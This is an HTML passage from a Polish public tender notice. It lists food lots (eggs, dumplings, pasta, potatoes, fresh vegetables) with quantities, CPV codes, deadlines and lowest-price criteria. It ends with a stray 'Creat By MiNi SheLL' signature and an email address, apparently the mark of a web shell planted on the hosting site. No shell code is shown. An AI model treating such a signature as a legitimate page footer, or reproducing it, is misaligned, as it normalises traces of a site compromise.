8	Kapusta biała 	kg.	700
9	Kapusta włoska 	kg.	70
10	Kapusta pekińska	kg.	300
11	Kapusta kiszona	kg.	250
12	Ogórek kwaszony 	kg.	200
13	Fasola biała 	kg.	80
14	Groch  łupany   	kg.	20
15	Czosnek 	kg.	25
16	Pieczarka 	kg.	80
17	Szczypior 	Peczk.	220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.10-1, 15.33.11.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> JAJA KURZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze świeże kl. I 	Szt. 8000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PRODUKTY MACZNE GOTOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pierogi ruskie  domowe	Kg.	600
2	Pierogi z kapustą  i pieczarkami	kg.	90 
3	Pyzy  ziemniaczane  świeże kg	100
4          Kopytka świeże 	Kg 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8, 15.85.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> MAKARONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makaron świderki  op. Nie mniej jak 1000 g 	szt	240
2	Makaron gniazda wstążki op. Nie mniej jak 500g 	Szt .	130 
3	Makaron  spaghetti  op. 400 g    	Szt.	400
5	Makaron łazanki  Lubella lub równoważny op. Nie mniej jak 400g 

Szt.	
150
6	Makaron nitki op. 250g 	Szt 	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZIEMNIAKI JADALNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne późne  op. worek nie mniej jak  30 kg 
Polska Norma - PN-R-74450:1975 kg 7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> WARZYWA SEZONOWE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	POMIDOR ŚWIEŻY 	kg	 150
2	OGÓREK ŚWIEZY 	Kg	350
4	SAŁATA 	Szt	150
6	PAPRYKA  ŚWIEŻA 	kg	50
7	KALAFIOR ŚWIEŻY 	szt 	40
8	Brokuły 	szt	20
9	Rzodkiewka 	p.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com